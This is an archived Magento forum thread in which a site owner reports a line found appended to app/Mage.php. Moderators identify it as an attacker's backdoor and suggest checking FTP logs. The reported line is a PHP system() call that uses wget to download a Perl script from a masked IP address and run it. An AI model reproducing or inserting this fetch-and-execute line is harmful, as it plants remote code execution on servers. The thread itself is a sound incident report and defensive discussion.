Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Known security flaw? Mage.php - Magento 1.4.1.1
 
Alex Leonard
Member
 
Total Posts:  43
Joined:  2010-02-03
 

Hi there,

We’ve just run into a potential security issue with an install of Magento 1.4.1.1 we have, and I’d love to get any advice or find out if anyone else has come across this issue.

So app/Mage.php had this line of code written at the end of the file:

system("id > /tmp/id;wget -q http://xxx.xxx.xxx.xxx/ppp -O /tmp/p.pl;perl /tmp/p.pl");

I’ve x’d out the IP address in question.

Could this be a bug in magento or php? Has anyone else had this issue?

Cheers,
Alex

 
Magento Community Magento Community
Magento Community
Magento Community
 
thebod
Moderator
 
Avatar
Total Posts:  81
Joined:  2010-08-11
 

Hello,

i have bad news :(
Your Magento-installation seems to be backdoored by an attacker.

This piece of code is not part of magento and acts like a little backdoor.
Could you please send me the ip-adress by pm or mail? Then i’ll take a look on the downloaded backdoor file and analyse the payload.

Best
thebod

 
Magento Community Magento Community
Magento Community
Magento Community
 
sysgradegmbh
Member
 
Total Posts:  37
Joined:  2009-09-22
 

If you have access to your FTP logs, you may want to search them for any accesses on app/Mage.php in the past as a first step to find out whether the file has been altered using FTP access. Seems to happen quite frequently in the past that malware is crawling for FTP credentials in order to infect websites, so I would go and look there first.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top